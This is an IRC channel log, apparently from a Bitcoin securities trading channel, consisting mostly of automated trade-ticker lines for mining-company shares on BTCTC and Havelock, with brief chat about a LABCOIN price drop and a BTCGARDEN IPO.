10 @ 0.001047 = 0.0105 BTC [+] Aug 08 19:12:35 [BTCTC] [ASICMINER-PT] 1 @ 3.599 BTC [+] Aug 08 19:12:53 [HAVELOCK] [XBOND] 2 @ 0.001047 = 0.0021 BTC [+] Aug 08 19:13:19 [HAVELOCK] [AM100] 3 @ 0.0359 = 0.1077 BTC [+] Aug 08 19:13:22 [BTCTC] [BASIC-MINING] 1 @ 0.235 BTC [-] Aug 08 19:13:23 [BTCTC] [BASIC-MINING] 24 @ 0.23 = 5.52 BTC [-] Aug 08 19:14:49 [BTCTC] [LABCOIN] 100 @ 0.001413 = 0.1413 BTC [-] Aug 08 19:15:32 [BTCTC] [LABCOIN] 50 @ 0.001411 = 0.0706 BTC [-] Aug 08 19:15:34 [BTCTC] [LABCOIN] 235 @ 0.001412 = 0.3318 BTC [+] Aug 08 19:15:35 [BTCTC] [LABCOIN] 1833 @ 0.001414 = 2.5919 BTC [+] Aug 08 19:17:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.03593 BTC [-] Aug 08 19:17:19 [BTCTC] [ASICMINER-PT] 1 @ 3.552 BTC [-] Aug 08 19:19:22 [BTCTC] [BASIC-MINING] 8 @ 0.23 = 1.84 BTC [-] Aug 08 19:19:34 [HAVELOCK] [SDSTM] 2 @ 0.0062992 = 0.0126 BTC [+] Aug 08 19:21:59 [BTCTC] [LABCOIN] 50 @ 0.001407 = 0.0704 BTC [-] Aug 08 19:22:29 [BTCTC] [DMS.MINING] 10 @ 0.005501 = 0.055 BTC [+] Aug 08 19:22:31 [BTCTC] [LABCOIN] 50 @ 0.001407 = 0.0704 BTC [-] Aug 08 19:22:34 [BTCTC] [DMS.MINING] 2 @ 0.0055 = 0.011 BTC [-] Aug 08 19:24:26 [BTCTC] [ASICMINER-PT] 1 @ 3.569 BTC [+] Aug 08 19:25:49 [BTCTC] [BASIC-MINING] 1 @ 0.228 BTC [-] Aug 08 19:25:50 [BTCTC] [BASIC-MINING] 2 @ 0.227 = 0.454 BTC [-] Aug 08 19:25:52 [BTCTC] [BASIC-MINING] 3 @ 0.2251 = 0.6753 BTC [-] Aug 08 19:25:52 [BTCTC] [BASIC-MINING] 7 @ 0.225 = 1.575 BTC [-] Aug 08 19:26:20 [HAVELOCK] [AM100] 1 @ 0.03589999 BTC [-] Aug 08 19:26:52 [BTCTC] [BASIC-MINING] 9 @ 0.225 = 2.025 BTC [-] Aug 08 19:27:08 [HAVELOCK] [AM100] 7 @ 0.0359 = 0.2513 BTC [+] Aug 08 19:27:10 [HAVELOCK] [AM100] 30 @ 0.036 = 1.08 BTC [+] Aug 08 19:27:50 [HAVELOCK] [AM100] 1 @ 0.036 BTC [+] Aug 08 19:29:40 [HAVELOCK] [XBOND] 37 @ 0.00104699 = 0.0387 BTC [-] Aug 08 19:30:31 [BTCTC] [TAT.ASICMINER] 4 @ 0.0358 = 0.1432 BTC [-] Aug 08 19:30:32 [BTCTC] [TAT.ASICMINER] 56 @ 0.03581 = 2.0054 BTC [+] Aug 08 19:30:44 [BTCTC] [LABCOIN] 20 @ 0.001406 = 0.0281 BTC [-] Aug 08 19:30:45 [BTCTC] [LABCOIN] 30 @ 0.001407 = 0.0422 BTC [+] Aug 08 19:31:28 [BTCTC] [LABCOIN] 6 @ 0.001413 = 0.0085 BTC [+] Aug 08 19:32:39 [BTCTC] [BASIC-MINING] 4 @ 0.2588 = 1.0352 BTC [+] Aug 08 19:33:19 [BTCTC] [ASICMINER-PT] 1 @ 3.56 BTC [-] Aug 08 19:33:42 [BTCTC] [BASIC-MINING] 1 @ 0.2587 BTC [-] Aug 08 19:34:55 [BTCTC] [ASICMINER-PT] 1 @ 3.551 BTC [-] Aug 08 19:35:23 [BTCTC] [BTCGARDEN] 14 @ 0.01574 = 0.2204 BTC [-] Aug 08 19:35:48 [BTCTC] [BTCGARDEN] 100 @ 0.01571 = 1.571 BTC [-] Aug 08 19:36:10 [BTCTC] [BTCGARDEN] 200 @ 0.0157 = 3.14 BTC [-] Aug 08 19:36:44 [BTCTC] [BTCGARDEN] 280 @ 0.01566 = 4.3848 BTC [-] Aug 08 19:36:57 https://bitcointalk.org/index.php?topic=67547.msg2891901#msg2891901 "I'm currently working closely with a new 28nm developer" Aug 08 19:37:02 Starting a new FPGA mining farm/contract Cognitive Resurrected on [BTC-TC] Aug 08 19:37:52 O you don't say Aug 08 19:38:26 Every body has the latest tech, in the future they say Aug 08 19:39:29 [BTCTC] [LABCOIN] 60 @ 0.001414 = 0.0848 BTC [+] Aug 08 19:40:28 [BTCTC] [LABCOIN] 3 @ 0.001411 = 0.0042 BTC [-] Aug 08 19:40:29 [BTCTC] [LABCOIN] 35 @ 0.00138 = 0.0483 BTC [-] Aug 08 19:40:30 [BTCTC] [LABCOIN] 6 @ 0.001367 = 0.0082 BTC [-] Aug 08 19:40:31 [BTCTC] [LABCOIN] 3 @ 0.001348 = 0.004 BTC [-] Aug 08 19:40:32 [BTCTC] [LABCOIN] 30 @ 0.001347 = 0.0404 BTC [-] Aug 08 19:40:33 [BTCTC] [LABCOIN] 40 @ 0.001346 = 0.0538 BTC [-] Aug 08 19:40:34 [BTCTC] [LABCOIN] 4 @ 0.001346 = 0.0054 BTC [-] Aug 08 19:40:36 [BTCTC] [LABCOIN] 323 @ 0.001345 = 0.4344 BTC [-] Aug 08 19:40:37 [BTCTC] [LABCOIN] 12 @ 0.001334 = 0.016 BTC [-] Aug 08 19:40:38 [BTCTC] [LABCOIN] 100 @ 0.001333 = 0.1333 BTC [-] Aug 08 19:40:39 [BTCTC] [LABCOIN] 325 @ 0.001332 = 0.4329 BTC [-] Aug 08 19:40:40 [BTCTC] [LABCOIN] 100 @ 0.001331 = 0.1331 BTC [-] Aug 08 19:40:40 [BTCTC] [LABCOIN] 2000 @ 0.00133 = 2.66 BTC [-] Aug 08 19:40:41 [BTCTC] [LABCOIN] 500 @ 0.00133 = 0.665 BTC [-] Aug 08 19:40:42 [BTCTC] [LABCOIN] 1697 @ 0.001323 = 2.2451 BTC [-] Aug 08 19:40:43 [BTCTC] [LABCOIN] 143 @ 0.001316 = 0.1882 BTC [-] Aug 08 19:40:45 [BTCTC] [LABCOIN] 1150 @ 0.001315 = 1.5123 BTC [-] Aug 08 19:40:46 [BTCTC] [LABCOIN] 125 @ 0.001311 = 0.1639 BTC [-] Aug 08 19:40:47 [BTCTC] [LABCOIN] 90 @ 0.001311 = 0.118 BTC [-] Aug 08 19:40:48 [BTCTC] [LABCOIN] 1000 @ 0.00131 = 1.31 BTC [-] Aug 08 19:40:49 [BTCTC] [LABCOIN] 62 @ 0.001309 = 0.0812 BTC [-] Aug 08 19:40:50 [BTCTC] [LABCOIN] 500 @ 0.001308 = 0.654 BTC [-] Aug 08 19:40:50 Someone heard something they didnt likee Aug 08 19:40:51 [BTCTC] [LABCOIN] 437 @ 0.001307 = 0.5712 BTC [-] Aug 08 19:40:52 [BTCTC] [LABCOIN] 2500 @ 0.001306 = 3.265 BTC [-] Aug 08 19:40:53 [BTCTC] [LABCOIN] 1000 @ 0.001305 = 1.305 BTC [-] Aug 08 19:40:53 [BTCTC] [LABCOIN] 417 @ 0.001304 = 0.5438 BTC [-] Aug 08 19:40:54 [BTCTC] [LABCOIN] 70 @ 0.001303 = 0.0912 BTC [-] Aug 08 19:40:55 [BTCTC] [LABCOIN] 3000 @ 0.001303 = 3.909 BTC [-] Aug 08 19:40:56 lol Aug 08 19:40:56 [BTCTC] [LABCOIN] 1000 @ 0.001302 = 1.302 BTC [-] Aug 08 19:40:57 [BTCTC] [BASIC-MINING] 5 @ 0.2251 = 1.1255 BTC [-] Aug 08 19:40:58 [BTCTC] [LABCOIN] 734 @ 0.001302 = 0.9557 BTC [-] Aug 08 19:40:59 [BTCTC] [BASIC-MINING] 4 @ 0.225 = 0.9 BTC [-] Aug 08 19:40:59 lol Aug 08 19:41:00 [BTCTC] [LABCOIN] 27 @ 0.001301 = 0.0351 BTC [-] Aug 08 19:41:00 [BTCTC] [BASIC-MINING] 2 @ 0.2225 = 0.445 BTC [-] Aug 08 19:41:01 [BTCTC] [LABCOIN] 24 @ 0.001301 = 0.0312 BTC [-] Aug 08 19:41:02 [BTCTC] [BASIC-MINING] 1 @ 0.2222 BTC [-] Aug 08 19:41:03 [BTCTC] [LABCOIN] 813 @ 0.0013 = 1.0569 BTC [-] Aug 08 19:41:04 the q&a isn't that bad Aug 08 19:41:04 [BTCTC] [BASIC-MINING] 4 @ 0.2222 = 0.8888 BTC [-] Aug 08 19:41:05 [BTCTC] [LABCOIN] 12 @ 0.0013 = 0.0156 BTC [-] Aug 08 19:41:06 [BTCTC] [BASIC-MINING] 5 @ 0.222 = 1.11 BTC [-] Aug 08 19:41:07 [BTCTC] [LABCOIN] 5000 @ 0.0013 = 6.5 BTC [-] Aug 08 19:41:08 [BTCTC] [BASIC-MINING] 27 @ 0.2219 = 5.9913 BTC [-] Aug 08 19:41:09 [BTCTC] [LABCOIN] 1 @ 0.0013 BTC [-] Aug 08 19:41:15 [BTCTC] [LABCOIN] 235 @ 0.0013 = 0.3055 BTC [-] Aug 08 19:41:27 [BTCTC] [BTCGARDEN] 40 @ 0.01561 = 0.6244 BTC [-] Aug 08 19:41:29 [BTCTC] [BTCGARDEN] 960 @ 0.0156 = 14.976 BTC [-] Aug 08 19:41:32 [BTCTC] [LABCOIN] 1 @ 0.001299 BTC [-] Aug 08 19:41:45 Aug 08 19:41:51 [BTCTC] [BTCGARDEN] 1000 @ 0.01579 = 15.79 BTC [+] Aug 08 19:41:52 [BTCTC] [BTCGARDEN] 241 @ 0.0158 = 3.8078 BTC [+] Aug 08 19:41:53 [BTCTC] [BTCGARDEN] 400 @ 0.01589 = 6.356 BTC [+] Aug 08 19:41:54 [BTCTC] [BTCGARDEN] 50 @ 0.01598 = 0.799 BTC [+] Aug 08 19:41:56 [BTCTC] [BTCGARDEN] 6140 @ 0.01598 = 98.1172 BTC [+] Aug 08 19:41:57 [BTCTC] [BTCGARDEN] 4881 @ 0.01599 = 78.0472 BTC [+] Aug 08 19:41:58 [BTCTC] [BTCGARDEN] 450 @ 0.016 = 7.2 BTC [+] Aug 08 19:41:59 hahahaha Aug 08 19:42:06 sell all lab, buy garden Aug 08 19:42:17 [BTCTC] [BTCGARDEN] 28 @ 0.01561 = 0.4371 BTC [-] Aug 08 19:42:30 [BTCTC] [BASIC-MINING] 1 @ 0.2581 BTC [+] Aug 08 19:42:58 [BTCTC] [LABCOIN] 50 @ 0.001295 = 0.0648 BTC [-] Aug 08 19:42:59 [BTCTC] [LABCOIN] 11 @ 0.001295 = 0.0142 BTC [-] Aug 08 19:43:00 [BTCTC] [LABCOIN] 235 @ 0.001296 = 0.3046 BTC [+] Aug 08 19:43:02 [BTCTC] [LABCOIN] 1413 @ 0.001299 = 1.8355 BTC [+] Aug 08 19:43:06 [BTCTC] [LABCOIN] 50 @ 0.0013 = 0.065 BTC [+] Aug 08 19:43:07 [BTCTC] [BTCGARDEN] 763 @ 0.0156 = 11.9028 BTC [-] Aug 08 19:43:09 [HAVELOCK] [XBOND] 27 @ 0.001047 = 0.0283 BTC [+] Aug 08 19:43:46 [BTCTC] [LABCOIN] 235 @ 0.001303 = 0.3062 BTC [+] Aug 08 19:43:48 [BTCTC] [LABCOIN] 650 @ 0.00127 = 0.8255 BTC [-] Aug 08 19:43:48 [BTCTC] [LABCOIN] 400 @ 0.001266 = 0.5064 BTC [-] Aug 08 19:43:49 [BTCTC] [LABCOIN] 125 @ 0.001263 = 0.1579 BTC [-] Aug 08 19:43:51 [BTCTC] [LABCOIN] 130 @ 0.001261 = 0.1639 BTC [-] Aug 08 19:43:52 [BTCTC] [LABCOIN] 750 @ 0.001261 = 0.9458 BTC [-] Aug 08 19:43:53 [BTCTC] [LABCOIN] 1200 @ 0.00126 = 1.512 BTC [-] Aug 08 19:43:54 [BTCTC] [LABCOIN] 5000 @ 0.00126 = 6.3 BTC [-] Aug 08 19:43:55 [BTCTC] [LABCOIN] 431 @ 0.001257 = 0.5418 BTC [-] Aug 08 19:43:56 [BTCTC] [LABCOIN] 1450 @ 0.001256 = 1.8212 BTC [-] Aug 08 19:43:57 [BTCTC] [LABCOIN] 2000 @ 0.001255 = 2.51 BTC [-] Aug 08 19:43:58 [BTCTC] [LABCOIN] 29 @ 0.001253 = 0.0363 BTC [-] Aug 08 19:43:59 [BTCTC] [LABCOIN] 149 @ 0.001253 = 0.1867 BTC [-] Aug 08 19:44:01 [BTCTC] [LABCOIN] 450 @ 0.001252 = 0.5634 BTC [-] Aug 08 19:44:01 [BTCTC] [LABCOIN] 224 @ 0.001251 = 0.2802 BTC [-] Aug 08 19:44:02 [BTCTC] [LABCOIN] 500 @ 0.001251 = 0.6255 BTC [-] Aug 08 19:44:03 [BTCTC] [LABCOIN] 18 @ 0.001251 = 0.0225 BTC [-] Aug 08 19:44:04 [BTCTC] [LABCOIN] 6 @ 0.001248 = 0.0075 BTC [-] Aug 08 19:44:05 [BTCTC] [LABCOIN] 50 @ 0.001247 = 0.0624 BTC [-] Aug 08 19:44:06 [BTCTC] [LABCOIN] 11 @ 0.001243 = 0.0137 BTC [-] Aug 08 19:44:07 [BTCTC] [LABCOIN] 40 @ 0.001242 = 0.0497 BTC [-] Aug 08 19:44:07 someone is pissed :p Aug 08 19:44:08 [BTCTC] [LABCOIN] 50 @ 0.001242 = 0.0621 BTC [-] Aug 08 19:44:09 [BTCTC] [LABCOIN] 33 @ 0.001237 = 0.0408 BTC [-] Aug 08 19:44:09 [BTCTC] [LABCOIN] 270 @ 0.001236 = 0.3337 BTC [-] Aug 08 19:44:10 <[1]lewicki> ruh roh Aug 08 19:44:10 [BTCTC] [LABCOIN] 6 @ 0.001215 = 0.0073 BTC [-] Aug 08 19:44:11 [BTCTC] [LABCOIN] 50 @ 0.001214 = 0.0607 BTC [-] Aug 08 19:44:12 [BTCTC] [LABCOIN] 3 @ 0.001208 = 0.0036 BTC [-] Aug 08 19:44:13 [BTCTC] [LABCOIN] 150 @ 0.001207 = 0.1811 BTC [-] Aug 08 19:44:14 [BTCTC] [LABCOIN] 125 @ 0.001207 = 0.1509 BTC [-] Aug 08 19:44:15 [BTCTC] [LABCOIN] 1000 @ 0.001206 = 1.206 BTC [-] Aug 08 19:44:16 [BTCTC] [LABCOIN] 100 @ 0.001205 = 0.1205 BTC [-] Aug 08 19:44:17 [BTCTC] [LABCOIN] 250 @ 0.001205 = 0.3013 BTC [-] Aug 08 19:44:18 [BTCTC] [LABCOIN] 2000 @ 0.001204 = 2.408 BTC [-] Aug 08 19:44:19 [BTCTC] [LABCOIN] 62 @ 0.001203 = 0.0746 BTC [-] Aug 08 19:44:20 [BTCTC] [LABCOIN] 500 @ 0.001202 = 0.601 BTC [-] Aug 08 19:44:21 [BTCTC] [LABCOIN] 19 @ 0.001201 = 0.0228 BTC [-] Aug 08 19:44:22 [BTCTC] [LABCOIN] 500 @ 0.001201 = 0.6005 BTC [-] Aug 08 19:44:23 [BTCTC] [LABCOIN] 1875 @ 0.001201 = 2.2519 BTC [-] Aug 08 19:44:24 [BTCTC] [LABCOIN] 50 @ 0.001201 = 0.0601 BTC [-] Aug 08 19:44:25 [BTCTC] [LABCOIN] 1728 @ 0.001201 = 2.0753 BTC [-] Aug 08 19:44:26 [BTCTC] [LABCOIN] 84 @ 0.001409 = 0.1184 BTC [+] Aug 08 19:44:27 [BTCTC] [LABCOIN] 50 @ 0.001409 = 0.0705 BTC [+] Aug 08 19:44:28 [BTCTC] [LABCOIN] 1697 @ 0.00141 = 2.3928 BTC [+] Aug 08 19:44:29 [BTCTC] [LABCOIN] 5 @ 0.001413 = 0.0071 BTC [+] Aug 08 19:44:30 [BTCTC] [LABCOIN] 40 @ 0.001414 = 0.0566 BTC [+] Aug 08 19:44:31 [BTCTC] [LABCOIN] 242 @ 0.001418 = 0.3432 BTC [+] Aug 08 19:44:32 [BTCTC] [LABCOIN] 39 @ 0.00142 = 0.0554 BTC [+] Aug 08 19:44:33 [BTCTC] [LABCOIN] 200 @ 0.00142 = 0.284 BTC [+] Aug 08 19:44:34 [BTCTC] [LABCOIN] 62 @ 0.001421 = 0.0881 BTC [+] Aug 08 19:44:35 [BTCTC] [LABCOIN] 500 @ 0.001422 = 0.711 BTC [+] Aug 08 19:44:36 [BTCTC] [LABCOIN] 137 @ 0.001447 = 0.1982 BTC [+] Aug 08 19:44:37 [BTCTC] [LABCOIN] 30 @ 0.001448 = 0.0434 BTC [+] Aug 08 19:44:38 [BTCTC] [LABCOIN] 70 @ 0.001448 = 0.1014 BTC [+] Aug 08 19:44:39 [BTCTC] [LABCOIN] 1000 @ 0.001449 = 1.449 BTC [+] Aug 08 19:44:40 [BTCTC] [LABCOIN] 250 @ 0.001449 = 0.3623 BTC [+] Aug 08 19:44:41 [BTCTC] [LABCOIN] 2000 @ 0.00145 = 2.9 BTC [+] Aug 08 19:44:41 a war of good and evil! Aug 08 19:44:42 [BTCTC] [LABCOIN] 1 @ 0.00145 BTC [+] Aug 08 19:44:43 [BTCTC] [LABCOIN] 106 @ 0.001477 = 0.1566 BTC [+] Aug 08 19:44:47 [BTCTC] [ACTIVEMINING] 50 @ 0.005794 = 0.2897 BTC [-] Aug 08 19:44:49 [BTCTC] [ACTIVEMINING] 68 @ 0.005793 = 0.3939 BTC [-] Aug 08 19:44:53 haha 15% Spread Aug 08 19:45:05 <[1]lewicki> what's the tldr? Aug 08 19:45:23 https://bitcointalk.org/index.php?topic=263445.msg2891705#msg2891705 Aug 08 19:45:27 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Aug 08 19:45:36 happened Aug 08 19:46:05 [HAVELOCK] [AM100] 3 @ 0.0351 = 0.1053 BTC [-] Aug 08 19:46:19 [HAVELOCK] [LABCO] 50 @ 0.0018199 = 0.091 BTC [+] Aug 08 19:46:29 [HAVELOCK] [XBOND] 10 @ 0.001047 = 0.0105 BTC [+] Aug 08 19:46:37 [BTCTC] [TAT.VIRTUALMINE] 14 @ 0.002232 = 0.0312 BTC [-] Aug 08 19:46:51 [HAVELOCK] [XBOND] 1 @ 0.001047 BTC [+] Aug 08 19:47:05 [BTCTC] [LABCOIN] 50 @ 0.001438 = 0.0719 BTC [-] Aug 08 19:47:06 [BTCTC] [LABCOIN] 235 @ 0.001439 = 0.3382 BTC [+] Aug 08 19:47:08 [BTCTC] [LABCOIN] 17 @ 0.001439 = 0.0245 BTC [+] Aug 08 19:47:10 [BTCTC] [LABCOIN] 312 @ 0.001477 = 0.4608 BTC [+] Aug 08 19:47:10 [BTCTC] [LABCOIN] 446 @ 0.001478 = 0.6592 BTC [+] Aug 08 19:48:03 ad on forum: http://www.btcgarden.com/news/btcgarden-ipo-startup.jsp Aug 08 19:48:25 yeah they have 3 slots Aug 08 19:48:41 [BTCTC] [ASICMINER-PT] 8 @ 3.551 = 28.408 BTC [-] Aug 08 19:48:43 [BTCTC] [ASICMINER-PT] 5 @ 3.55 = 17.75 BTC [-] Aug 08 19:48:44 [BTCTC] [ASICMINER-PT] 4 @ 3.501 = 14.004 BTC [-] Aug 08 19:48:45 [BTCTC] [ASICMINER-PT] 3 @ 3.5 = 10.5 BTC [-] Aug 08 19:48:46 [BTCTC] [ASICMINER-PT] 5 @ 3.5 = 17.5 BTC [-] Aug 08 19:49:23 [BTCTC] [BTCGARDEN] 12 @ 0.01561 = 0.1873 BTC [+] Aug 08 19:49:49 [BTCTC] [LABCOIN] 50 @ 0.001432 = 0.0716 BTC [-] Aug 08 19:49:50 [BTCTC] [LABCOIN] 12 @ 0.001433 = 0.0172 BTC [+] Aug 08 19:49:51 [BTCTC] [LABCOIN] 50 @ 0.001435 = 0.0718 BTC [+] Aug 08 19:49:52 [BTCTC] [LABCOIN] 20 @ 0.001438 = 0.0288 BTC [+] Aug 08 19:49:54 [BTCTC] [LABCOIN] 18 @ 0.001439 = 0.0259 BTC [+] Aug 08 19:49:55 [BTCTC] [LABCOIN] 150 @ 0.00144 = 0.216 BTC [+] Aug 08 19:49:56 [BTCTC] [LABCOIN] 206 @ 0.001477 = 0.3043 BTC [+] Aug 08 19:49:57 [BTCTC] [LABCOIN] 494 @ 0.001478 = 0.7301 BTC [+] Aug 08 19:50:18 "We've already put up 2,000,000 shares at the price 0.016BTC per share, about 550,000 shares traded up to now." Aug 08 19:50:29 what does that mean? they sold only 25%? Aug 08 19:50:32 [BTCTC] [LABCOIN] 30 @ 0.001477 = 0.0443 BTC [-] Aug 08 19:50:42 [BTCTC] [LABCOIN] 20 @ 0.001477 = 0.0295 BTC [-] Aug 08 19:50:48 ?? Aug 08 19:50:51 [BTCTC] [LABCOIN] 1180 @ 0.001478 = 1.744 BTC [+] Aug 08 19:50:55 context? Aug 08 19:51:08 the link above Aug 08 19:51:20 ah Aug 08 19:51:28 well, i think the landing page was uploaded during the ipo Aug 08 19:51:30 and not updated Aug 08 19:53:21 [BTCTC] [BTCGARDEN] 14 @ 0.01562 = 0.2187 BTC [+] Aug 08 19:53:36 [BTCTC] [BTCGARDEN] 14 @ 0.01562 = 0.2187 BTC [+] Aug 08 19:53:37 [BTCTC] [BTCGARDEN] 336 @ 0.0156 = 5.2416 BTC [-] Aug 08 19:53:52 [BTCTC] [NASTY-PT] 4 @ 0.00361 = 0.0144 BTC [-] Aug 08 19:53:54 [BTCTC] [NASTY-PT] 50 @ 0.003603 = 0.1802 BTC [-] Aug 08 19:53:55 [BTCTC] [NASTY-PT] 110 @ 0.003602 = 0.3962 BTC [-] Aug 08 19:53:56 [BTCTC] [NASTY-PT] 56 @ 0.003501 = 0.1961 BTC [-] Aug 08 19:54:29 [BTCTC] [ASICMINER-PT] 1 @ 3.488 BTC [-] Aug 08 19:54:31 [BTCTC] [ASICMINER-PT] 1 @ 3.487 BTC [-] Aug 08 19:54:32 [BTCTC] [ASICMINER-PT] 10 @ 3.474 = 34.74 BTC [-] Aug 08 19:54:32 [BTCTC] [ASICMINER-PT] 4 @ 3.473 = 13.892 BTC [-] Aug 08 19:54:33 [BTCTC] [ASICMINER-PT] 2 @ 3.47 = 6.94 BTC [-] Aug 08 19:54:35 [BTCTC] [ASICMINER-PT] 1 @ 3.47 BTC [-] Aug 08 19:54:36 [BTCTC] [ASICMINER-PT] 3 @ 3.47 = 10.41 BTC [-] Aug 08 19:54:37 [BTCTC] [ASICMINER-PT] 1 @ 3.47 BTC [-] Aug 08 19:54:39 hmmm Aug 08 19:56:07 [BTCTC] [BTCGARDEN] 28 @ 0.01562 = 0.4374 BTC [+] Aug 08 19:56:08 [BTCTC] [BTCGARDEN] 22 @ 0.0156 = 0.3432 BTC [-] Aug 08 19:56:54 http://bcoinnews.com/bitcoin-assets-news/ Aug 08 19:57:02 [BTCTC] [ACTIVEMINING] 50 @ 0.00564 = 0.282 BTC [-] Aug 08 19:57:04 [BTCTC] [ACTIVEMINING] 68 @ 0.005639 = 0.3835 BTC [-] Aug 08 19:57:05 [BTCTC] [ACTIVEMINING] 50 @ 0.005639 = 0.282 BTC [-] Aug 08 19:57:05 labcoin summary Aug 08 19:57:06 [BTCTC] [ACTIVEMINING] 100 @ 0.005602 = 0.5602 BTC [-] Aug 08 19:57:06 [BTCTC] [ACTIVEMINING] 10 @ 0.005599 = 0.056 BTC [-] Aug 08 19:57:07 [BTCTC] [ACTIVEMINING] 26 @ 0.005553 = 0.1444 BTC [-] Aug 08 19:57:08 [BTCTC] [ACTIVEMINING] 132 @ 0.005552 = 0.7329 BTC [-] Aug 08 19:57:09 [BTCTC] [ACTIVEMINING] 20 @ 0.005507 = 0.1101 BTC [-] Aug 08 19:57:10 [BTCTC] [ACTIVEMINING] 20 @ 0.005506 = 0.1101 BTC [-] Aug 08 19:57:11 [BTCTC] [LABCOIN] 50 @ 0.001462 = 0.0731 BTC [-] Aug 08 19:57:12 [BTCTC] [ACTIVEMINING] 80 @ 0.005505 = 0.4404 BTC [-] Aug 08 19:57:13 [BTCTC] [LABCOIN] 8 @ 0.001463 = 0.0117 BTC [+] Aug 08 19:57:14 [BTCTC] [LABCOIN] 16 @ 0.001465 = 0.0234 BTC [+] Aug 08 19:57:15 [BTCTC] [ACTIVEMINING] 215 @ 0.005501 = 1.1827 BTC [-] Aug 08 19:57:16 [BTCTC] [LABCOIN] 5 @ 0.00147 = 0.0074 BTC [+] Aug 08 19:57:17 [BTCTC] [ACTIVEMINING] 200 @ 0.0055 = 1.1 BTC [-] Aug 08 19:57:18 [BTCTC] [LABCOIN] 40 @ 0.001471 = 0.0588 BTC [+] Aug 08 19:57:19 [BTCTC] [LABCOIN] 125 @ 0.001474 = 0.1843 BTC [+] Aug 08 19:57:20 [BTCTC] [ACTIVEMINING] 2 @ 0.0055 = 0.011 BTC [-] Aug 08 19:57:21 [BTCTC] [LABCOIN] 1000 @ 0.001475 = 1.475 BTC [+] Aug 08 19:57:22 [BTCTC] [LABCOIN] 324 @ 0.001476 = 0.4782 BTC [+] Aug 08 19:57:23 [BTCTC] [ACTIVEMINING] 800 @ 0.0055 = 4.4 BTC [-] Aug 08 19:57:24 [BTCTC] [LABCOIN] 2232 @ 0.001477 = 3.2967 BTC [+] Aug 08 19:57:25 [BTCTC] [ACTIVEMINING] 75 @ 0.0055 = 0.4125 BTC [-] Aug 08 19:57:26 [BTCTC] [ACTIVEMINING] 12 @ 0.005471 = 0.0657 BTC [-] Aug 08 19:57:26 [BTCTC] [ACTIVEMINING] 60 @ 0.00547 = 0.3282 BTC [-] Aug 08 19:57:27 [BTCTC] [ACTIVEMINING] 50 @ 0.005463 = 0.2732 BTC [-] Aug 08 19:57:28 [BTCTC] [ACTIVEMINING] 250 @ 0.005462 = 1.3655 BTC [-] Aug 08 19:57:29 [BTCTC] [ACTIVEMINING] 1 @ 0.005451 BTC [-] Aug 08 19:57:30 [BTCTC] [ACTIVEMINING] 6 @ 0.00545 = 0.0327 BTC [-] Aug 08 19:57:31 [BTCTC] [ACTIVEMINING] 806 @ 0.005405 = 4.3564 BTC [-] Aug 08 19:57:32 [BTCTC] [ACTIVEMINING] 395 @ 0.005404 = 2.1346 BTC [-] Aug 08 19:57:33 [BTCTC] [ACTIVEMINING] 3626 @ 0.005402 = 19.5877 BTC [-] Aug 08 19:57:34 [BTCTC] [ACTIVEMINING] 10 @ 0.005401 = 0.054 BTC [-] Aug 08 19:57:35 [BTCTC] [ACTIVEMINING] 1 @ 0.0054 BTC [-] Aug 08 19:57:36 [BTCTC] [ACTIVEMINING] 227 @ 0.005398 = 1.2253 BTC [-] Aug 08 19:57:37 [BTCTC] [ACTIVEMINING] 567 @ 0.005397 = 3.0601 BTC [-] Aug 08 19:57:38 [BTCTC] [ACTIVEMINING] 491 @ 0.005395 = 2.6489 BTC [-] Aug 08 19:57:39 [BTCTC] [LABCOIN] 50 @ 0.001476 = 0.0738 BTC [-] Aug 08 19:57:40 [BTCTC] [LABCOIN] 5458 @ 0.001477 = 8.0615 BTC [+] Aug 08 19:57:41 [BTCTC] [LABCOIN] 40 @ 0.001479 = 0.0592 BTC [+] Aug 08 19:57:42 [BTCTC] [LABCOIN] 8 @ 0.001482 = 0.0119 BTC [+] Aug 08 19:57:43 [BTCTC] [LABCOIN] 70 @ 0.001483 = 0.1038 BTC [+] Aug 08 19:57:44 [BTCTC] [LABCOIN] 125 @ 0.001486 = 0.1858 BTC [+] Aug 08 19:57:45 [BTCTC] [LABCOIN] 1000 @ 0.001487 = 1.487 BTC [+] Aug 08 19:57:46 [BTCTC] [ASICMINER-PT] 2 @ 3.47 = 6.94 BTC [-] Aug 08 19:57:49 go go Aug 08 19:58:09 [BTCTC] [LABCOIN] 50 @ 0.001492 = 0.0746 BTC [+] Aug 08 19:58:10 [BTCTC] [LABCOIN] 507 @ 0.001493 = 0.757 BTC [+] Aug 08 19:58:11 [BTCTC] [LABCOIN] 943 @ 0.001494 = 1.4088 BTC [+] Aug 08 19:58:23 [BTCTC] [LABCOIN] 3120 @ 0.001494 = 4.6613 BTC [+] Aug 08 19:58:24 [BTCTC] [LABCOIN] 129 @ 0.001495 = 0.1929 BTC [+] Aug 08 19:59:25 [BTCTC] [BTCGARDEN] 25 @ 0.0156 = 0.39 BTC [-] Aug 08 20:00:16 [HAVELOCK] [AM1] 1 @ 3.60018 BTC [-] Aug 08 20:00:49 [BTCTC] [MININGCO.ETF] 2 @ 1.11 = 2.22 BTC [-] Aug 08 20:01:51 [BTCTC] [BASIC-MINING] 1 @ 0.2231 BTC [-] Aug 08 20:02:01 Were VBS questions answered? There so much junk in the channel, i can't tell lol Aug 08 20:02:18 [BTCTC] [ACTIVEMINING] 50 @ 0.005412 = 0.2706 BTC [+] Aug 08 20:02:41 lol yeah i think some of them were Aug 08 20:02:41 [BTCTC] [ACTIVEMINING] 50 @ 0.005415 = 0.2708 BTC [+] Aug 08 20:02:44 [BTCTC] [BFMINES] 1 @ 0.00387 BTC [-] Aug 08 20:02:45 [BTCTC] [BFMINES] 107 @ 0.003201 = 0.3425 BTC [-] Aug 08 20:02:47 [BTCTC] [BFMINES] 106 @ 0.0032 = 0.3392 BTC [-] Aug 08 20:02:48 [BTCTC] [BFMINES] 1 @ 0.003183 BTC [-] Aug 08 20:02:49 [BTCTC] [DMS.MINING] 60 @ 0.005363 = 0.3218 BTC [-] Aug 08 20:02:50 [BTCTC] [BFMINES] 300 @ 0.003001 = 0.9003 BTC [-] Aug 08 20:02:51 [BTCTC] [DMS.MINING] 10 @ 0.005362 = 0.0536 BTC [-] Aug 08 20:02:52 others he said he would have to get info from lead devs Aug 08 20:02:53 [BTCTC] [BFMINES] 200 @ 0.003 = 0.6 BTC [-] Aug 08 20:02:54 [BTCTC] [DMS.MINING] 40 @ 0.00536 = 0.2144 BTC [-] Aug 08 